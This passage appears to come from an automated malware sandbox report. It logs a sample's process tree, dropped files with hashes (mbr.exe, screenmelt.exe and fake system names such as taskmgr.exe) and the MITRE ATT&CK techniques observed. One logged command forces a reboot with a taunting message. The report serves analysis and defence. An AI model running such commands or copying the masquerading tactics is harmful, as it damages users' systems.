"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
4⤵
PID:3388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
4⤵
PID:2340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
4⤵
PID:240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
4⤵
PID:1328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
4⤵
PID:4072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:1
4⤵
PID:4900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
4⤵
PID:4584

C:\Windows\system32\timeout.exe
timeout /t 15 /nobreak
3⤵
- Delays execution with timeout.exe
PID:224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=russian+democratic+federative+republic
3⤵
PID:2960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8
4⤵
PID:4840

C:\Windows\system32\timeout.exe
timeout /t 15 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=moskau+moskau
3⤵
PID:3608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8
4⤵
PID:1208

C:\Windows\system32\shutdown.exe
shutdown /r /t 3 /c "id like to see you fix this lol"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3688

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4644

C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4928

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a3c855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2820

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8f2eb94e31cadfb6eb07e6bbe61ef7ae

SHA1
3f42b0d5a90408689e7f7941f8db72a67d5a2eab

SHA256
d222c8e3b19cda2657629a486faf32962e016fc66561ce0d17010afdb283c9de

SHA512
9f7f84149885b851e0bf7173c540e466a2b2eb9907d8b608f60360933328cc75d9d1b63640ea4ecc1e64ecc5dd7ee74d82903f96a8b4418ca56296641a8c0703

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
d56e8f308a28ac4183257a7950ab5c89

SHA1
044969c58cef041a073c2d132fa66ccc1ee553fe

SHA256
0bc24451c65457abc1e4e340be2f8faceae6b6ec7768a21d44bcd14636543bae

SHA512
fd5798559f4025ec3408f5550b8671d394b1ec83b85fdac8c005b0cc3e183272bdd07db15a156a572c9c5e5798badf235dc10aae62a052efa8dd9dfdbdca8189

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
62ec395204e0aae9915a3b732f94082d

SHA1
ad6020612c27b62c0e590459c4f36aaf2ed7c138

SHA256
dd585d49302ad327220f0bd5d682f83498a501539a9ff1057f2a9c993ddc723b

SHA512
430cafa8b002e2d6041c4ac74f8588f6436659a48fe063abbe6e38d440ed04ca795fd001a296b83bc9476c76feabd22dae4da8e557e468abbd909fa905e7717c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
8KB

MD5
01cae2936004d4a9e2099ae92bb8520c

SHA1
980fa86f666537e848dfac4a7f76c3afa5255dd4

SHA256
fae06ad03e25a3f2a2046556aa51c19f086bbef6ead452ff6330be346a07ccd6

SHA512
e11bfe642e00f97b75b2cdad55452bd06ccbf3f94ff102ac79486eead74f6e5375695230eee14ff1ca3b21fa109319385964012dd2817812d412033a1e184d1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
8KB

MD5
fc60e2e1f4ebe524fc3ee72a6c9f68a4

SHA1
e2e57f927c2e20b22151e40b4513f0e703dc0edf

SHA256
ed7b39b8d905b6602f449271007e9fa5ce8cd4d4154d985d74c6772655d359ab

SHA512
4c8a611d5104da9b99f5b815c3abaf1aacb44ca22ab0ee31fcdee6673a192e8da2f4523403fa9d1dacfb3c4b9a3e18b2282ff036ed04e44788432e81e851ac2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat
Filesize
4KB

MD5
4a79415752ab6e7d4706620f91e372b0

SHA1
830c6d1a491031f57b7827dc23fdb3fb1b066dcb

SHA256
7f4a90cb061298868b15088311358326bbf9762d738b0238f61fe6372d80d4a0

SHA512
f0ea1c15e6f10e8ec012e9bd9ee4f2afc2b229ef508cd29ce498d44091ecdc14f13f34fe07ccae3f6e68c5a3da0b2202a94078d0b19cc159a82ef601a413c6b6

Download Submit
C:\Users\Admin\Downloads\user.bmp
Filesize
7KB

MD5
bce2c2fff9af8eb17db5fb8ec2f8468c

SHA1
b509ac36b55378e6cb985b5b6361bc7e6ff09c64

SHA256
63d356735b63778fdf39861fe03155e3766bcab0825074d72a540d1a309e12fe

SHA512
22baf89fc7b249e3fad8ffdeb6a67316e0a28b8e9a2e10cccca0ab99c31a40e8c2836b876ce3501706196d2303b88b52cc29e107b894eb9d3b1addbedfaf8d68

Download Submit
C:\Users\Admin\downloads\colorcmd.exe
Filesize
122KB

MD5
f07ad62ffe36c3350f14186618dffea4

SHA1
01372c5536edd2c0ad51df9d3cf51237f122384f

SHA256
31dee760b868645ad0f4e7270ec54942d01b1a7df769f04e52948b32e681a346

SHA512
3302acab75c14295ab9aadde5d25d8ffc7795e1e15357614692489a6e0edf86d2f5e464917251834d27b3ad95f262d3bc3088479a957fe2bf691b1066ced6406

Download Submit
C:\Users\Admin\downloads\mbr.exe
Filesize
47KB

MD5
8562ed46d745dceb3cc268693ca25c83

SHA1
309067f0c9703084654495a47e67f7a40824700d

SHA256
ea5d21e6598d52b30e9d055bc406c6227bbadb5c493addb27b32fb16a6dcae8c

SHA512
52f23e70f7ea6eab1a50a4008e563d787732f7361dfe10c48f39dae42bce023c90449c9a903733fab13c49b50f8c4fa7d4864ab26c69326aab0149c765fd677b

Download Submit
C:\Users\Admin\downloads\mmc.exe
Filesize
116KB

MD5
1568445f077482ac1d17a82403236a50

SHA1
ab42cb00af4f08629c30af053325e0bc3332659b

SHA256
584c00a54afbf23413fd3d39a06d07c0ae811965e5670ebc5d8abad70a594ce5

SHA512
83941d9ec3e89d4301405800afc3140e3406cbf2d405e1fe886136ecb669375fcd9e2adfdfeb897c4603d8220db374e63444608accd8ba4ba3a7dbd7aac0d6ca

Download Submit
C:\Users\Admin\downloads\msiexec.exe
Filesize
210KB

MD5
a968951f4f6aeec3eb1aa67b82fdcee9

SHA1
52d40548aaed7604709f78da62f7c22810e05cf3

SHA256
79b1ba6b9959dfe0289ff1182cf2ecb130f8568dd67a4fec6b6b8464dbfb4446

SHA512
bba1caf8e2173a082e220eec1f1b5da880d39afca353cfafe8a7850d4a7d85e1ec0ff771bffb440afdc475eef50f9b720b5a3e9aea6c6cd2b3a8486a1681df3a

Download Submit
C:\Users\Admin\downloads\screenmelt.exe
Filesize
116KB

MD5
906a6d30ea07a63b252c21ff4e8cf785

SHA1
cceae82b6a75838a038096cf8dd721369764e113

SHA256
0850c8ca4e063475b6d83171b28eaaf1aec4452814a6c2e07acfc6f9df1d0359

SHA512
dafb680429cfe5db8dc9528a3f515e1e9e18289c97bb6cbcf612934ba441d97a60392878ee3554bfa3f0ecc40b49f4db4fef6bc3895681d4fa8c563a1a43c334

Download Submit
C:\Users\Admin\downloads\taskmgr.exe
Filesize
139KB

MD5
12c0b030ad5d135dce89d85becfdb76f

SHA1
f8afc5bb441b54a0b4dcb66e158abd44187a43fe

SHA256
8436fcc98e61ea958dd6adf346a81c5d08cb91e9d9a6cc67cacf4f1b14db13b9

SHA512
710f39020f9e06d087d7ff55fe887203716a24080e368dbaa837421f8874fc35f0d39ac1634bfaa60d4fee4c93f4699872c725e63d759dfd81dc751a56ead61a

Download Submit
C:\Users\Admin\downloads\winnt64.exe
Filesize
188KB

MD5
aa992d93467882ff211f211495e6c545

SHA1
75a1a182af719168b9ca7b9c42282b997f82d443

SHA256
dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88

SHA512
54d07b5f123b20128459de04694ed295275498c646fef596830c2c98ff1a8fa4741c95ce72be6d59a713fc6d7d7365c4f13eace2ed6bf357ebef44885b882d5d

Download Submit
C:\Users\Admin\downloads\winntcus64.png
Filesize
135KB

MD5
6630a0fb912cd00e64f2014401094beb

SHA1
e869c10b7f664332a1274e6de8812d4dc21d1bdc

SHA256
2b8c4658c0f5b47bab5f6ba1135d7d5a8d31414cf788b8fa7c4c520d1db92ba2

SHA512
6c7b97f677d43d22b1a2d7a12421f7fbcf4bb0017647dab846052560c0b1792ee1cdc8220a29eec9f5ab6f23be51b2c375101353e2c2112c492f59c7a701af87

Download Submit
C:\Users\Public\Desktop\ISEEYOU6.prsnlz
Filesize
73B

MD5
f2c62761eaf03a1477f392a23a2b951d

SHA1
243ae1c1ec3377cf835efb728180dfd19567d2f2

SHA256
f033d117272cafc4072c2a9e6986381939f19eebe57d08be26834f752a9c4a18

SHA512
d7eaf3915aadaf5b0d2cb7ca740b8bbd8ce93f809ebf39e92e4934c96d44020a631787aeec3e28c290a51c01c91a5044f3d4b679d8451fd8a1cdc871a5e47c27

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads